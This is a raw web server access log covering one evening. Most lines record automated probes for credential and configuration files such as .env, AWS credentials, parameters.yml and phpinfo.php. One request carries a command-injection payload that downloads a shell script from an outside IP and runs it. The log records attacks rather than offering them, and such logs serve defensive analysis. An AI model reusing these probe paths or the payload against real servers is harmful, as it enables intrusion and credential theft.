136.144.35.37 - - [22/Mar/2024:19:21:16 +0100] "GET /fedex/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.52 - - [22/Mar/2024:19:21:19 +0100] "POST /fedex/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.50 - - [22/Mar/2024:19:21:22 +0100] "GET /__tests__/test-become/.env HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.38 - - [22/Mar/2024:19:21:28 +0100] "POST /__tests__/test-become/.env HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
91.141.34.48 - - [22/Mar/2024:19:21:34 +0100] "GET /entry.php?id=10271&&ser=131633 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131572" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:21:34 +0100] "GET /gui/javascript/form_form.js?1711131694 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.37 - - [22/Mar/2024:19:21:34 +0100] "GET /local/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.48 - - [22/Mar/2024:19:21:41 +0100] "GET /rest/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.50 - - [22/Mar/2024:19:21:44 +0100] "POST /rest/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.49 - - [22/Mar/2024:19:21:49 +0100] "GET /shared/.env%20 HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.42 - - [22/Mar/2024:19:21:52 +0100] "POST /shared/.env%20 HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.53 - - [22/Mar/2024:19:21:54 +0100] "GET /sources/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.44 - - [22/Mar/2024:19:21:58 +0100] "POST /sources/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.53 - - [22/Mar/2024:19:22:00 +0100] "GET /enviroments/.env.production HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.53 - - [22/Mar/2024:19:22:02 +0100] "POST /enviroments/.env.production HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.41 - - [22/Mar/2024:19:22:06 +0100] "GET /enviroments/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.58 - - [22/Mar/2024:19:22:09 +0100] "POST /enviroments/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.55 - - [22/Mar/2024:19:22:26 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.35 - - [22/Mar/2024:19:22:31 +0100] "GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
91.141.34.48 - - [22/Mar/2024:19:22:35 +0100] "GET /entry.php?id=10271&&ser=131694 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:22:35 +0100] "GET /gui/javascript/form_form.js?1711131755 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.48 - - [22/Mar/2024:19:22:44 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.47 - - [22/Mar/2024:19:22:48 +0100] "GET /debug/default/view.html HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.61 - - [22/Mar/2024:19:23:00 +0100] "GET /debug/default/view HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
91.90.120.155 - - [22/Mar/2024:19:23:01 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:76.0) Gecko/20100101 Firefox/76.0"
136.144.35.59 - - [22/Mar/2024:19:23:04 +0100] "GET /frontend/web/debug/default/view HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.42 - - [22/Mar/2024:19:23:12 +0100] "GET /web/debug/default/view HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.55 - - [22/Mar/2024:19:23:17 +0100] "GET /sapi/debug/default/view HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.44 - - [22/Mar/2024:19:23:28 +0100] "GET /config.json HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.34 - - [22/Mar/2024:19:23:29 +0100] "GET /AwsConfig.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.48 - - [22/Mar/2024:19:23:30 +0100] "GET /awsconfig.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.36 - - [22/Mar/2024:19:23:33 +0100] "GET /aws.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.49 - - [22/Mar/2024:19:23:34 +0100] "GET /conf.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
91.141.34.48 - - [22/Mar/2024:19:23:36 +0100] "GET /entry.php?id=10271&&ser=131755 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:23:36 +0100] "GET /gui/javascript/form_form.js?1711131816 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131755" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.37 - - [22/Mar/2024:19:23:38 +0100] "GET /env.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.57 - - [22/Mar/2024:19:23:46 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.57 - - [22/Mar/2024:19:23:53 +0100] "GET /.json HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.48 - - [22/Mar/2024:19:24:00 +0100] "GET /smtp.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.61 - - [22/Mar/2024:19:24:02 +0100] "GET /db.json HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.54 - - [22/Mar/2024:19:24:05 +0100] "GET /sendgrid.json HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.60 - - [22/Mar/2024:19:24:13 +0100] "GET /ws-config.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.50 - - [22/Mar/2024:19:24:16 +0100] "GET /_wpeprivate/config.json HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.48 - - [22/Mar/2024:19:24:21 +0100] "GET /deployment-config.json HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.49 - - [22/Mar/2024:19:24:30 +0100] "GET /sftp-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.41 - - [22/Mar/2024:19:24:36 +0100] "GET /db/robomongo.json HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
91.141.34.48 - - [22/Mar/2024:19:24:37 +0100] "GET /entry.php?id=10271&&ser=131816 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131755" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:24:37 +0100] "GET /gui/javascript/form_form.js?1711131877 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131816" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:24:42 +0100] "GET /robomongo.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.51 - - [22/Mar/2024:19:24:46 +0100] "GET /client_secrets.json HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.52 - - [22/Mar/2024:19:24:51 +0100] "GET /user-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.39 - - [22/Mar/2024:19:24:56 +0100] "GET /ssh-config.json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.34 - - [22/Mar/2024:19:25:02 +0100] "GET /database-config.json HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.37 - - [22/Mar/2024:19:25:06 +0100] "GET /config/default.json HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
136.144.35.43 - - [22/Mar/2024:19:25:10 +0100] "GET /config/config.json HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.49 - - [22/Mar/2024:19:25:11 +0100] "GET /credentials/config.json HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.43 - - [22/Mar/2024:19:25:14 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.60 - - [22/Mar/2024:19:25:26 +0100] "GET /.aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:25:38 +0100] "GET /entry.php?id=10271&&ser=131877 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131816" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:25:38 +0100] "GET /gui/javascript/form_form.js?1711131938 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131877" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.40 - - [22/Mar/2024:19:25:42 +0100] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.55 - - [22/Mar/2024:19:25:51 +0100] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.38 - - [22/Mar/2024:19:25:57 +0100] "GET /app/config/parameters.yml HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
91.141.34.48 - - [22/Mar/2024:19:25:58 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1876 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:25:58 +0100] "GET /gui/javascript/form_form.js?1711131958 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:25:59 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2432 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:26:00 +0100] "GET /gui/javascript/form_form.js?1711131960 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:26:00 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:26:00 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1911 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.34 - - [22/Mar/2024:19:26:07 +0100] "GET /parameters.yml HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.56 - - [22/Mar/2024:19:26:13 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.39 - - [22/Mar/2024:19:26:18 +0100] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 374 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.37 - - [22/Mar/2024:19:26:20 +0100] "GET /phpinfo.php HTTP/1.1" 200 63348 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
146.19.24.28 - - [22/Mar/2024:19:47:56 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
169.150.226.198 - - [22/Mar/2024:20:03:20 +0100] "HEAD /.env HTTP/1.1" 404 - "-" "Go-http-client/1.1"
87.120.84.69 - - [22/Mar/2024:20:13:21 +0100] "GET /.git/config HTTP/1.1" 404 356 "-" "fasthttp"
23.224.198.111 - - [22/Mar/2024:20:14:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "hacked-by-matrix"
198.235.24.185 - - [22/Mar/2024:21:07:29 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.94.92.60 - - [22/Mar/2024:21:13:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.92.243.107 - - [22/Mar/2024:21:42:26 +0100] "GET /nf_tracking.php HTTP/1.1" 404 299 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.242.226.10 - - [22/Mar/2024:22:48:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
205.210.31.39 - - [22/Mar/2024:23:20:18 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.55 - - [23/Mar/2024:00:05:11 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.55 - - [23/Mar/2024:00:05:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.55 - - [23/Mar/2024:00:05:14 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.145.55 - - [23/Mar/2024:00:05:14 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.55 - - [23/Mar/2024:00:05:14 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
191.96.106.34 - - [23/Mar/2024:00:40:17 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:95.0) Gecko/20100101 Firefox/95.0"